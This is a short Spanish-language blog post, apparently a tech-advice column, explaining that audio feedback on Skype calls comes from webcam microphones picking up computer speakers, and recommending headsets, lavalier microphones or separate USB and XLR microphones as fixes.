Probablemente no. Lo más posible es que mientras se comunica esté usted usando el micrófono de la webcam junto con los altavoces de su computadora, y esto produce lo que se llama acoplamiento. Para una mejor calidad sonora, aísle o aleje lo mejor que pueda la fuente sonora (los altavoces) del micrófono.

La mejor forma de hacerlo, dentro de un presupuesto razonable, es comprar un casco con micrófono incorporado y usarlo para llamadas por Skype. Con un casco, los audífonos están completamente aislados del micrófono, proporcionando el mejor sonido posible para usted y su interlocutor, quien debe hacer lo mismo para darle también a usted el mejor sonido.

SIN CASCO
Un lector nos escribe: Estoy preparando una vídeo entrevista por Skype y no quiero portar un casco, ¿hay una buena solución para esto?

Hay un par de opciones. La más profesional, y quizás la más cara, es invertir en un micrófono lavalier o de solapa, que permite poner un pequeño audífono en la oreja y un pequeño micrófono en la solapa u otro lugar de la ropa. Es lo que usan muchos animadores de la televisión. Equipos lavalier con conexión USB para la computadora cuestan entre cien y más de mil dólares. Visite una tienda electrónica local para ver la oferta.

Otra opción es usar un micrófono separado sobre un pedestal y colocarlo junto a usted, de modo que no aparezca en la imagen. Para oír puede usar los altavoces de su computadora, aunque deberá aislar de alguna manera el micrófono de los altavoces. Puede conectar a su computadora un micrófono XLR a través del puerto USB mediante un adaptador como el Shure X2U. Por último, puede comprar simplemente un micrófono USB del tipo Logitech, disponible por menos de 20 dólares.



Publicado por jacintoluque @ 8:22
Comentarios (0)  | Enviar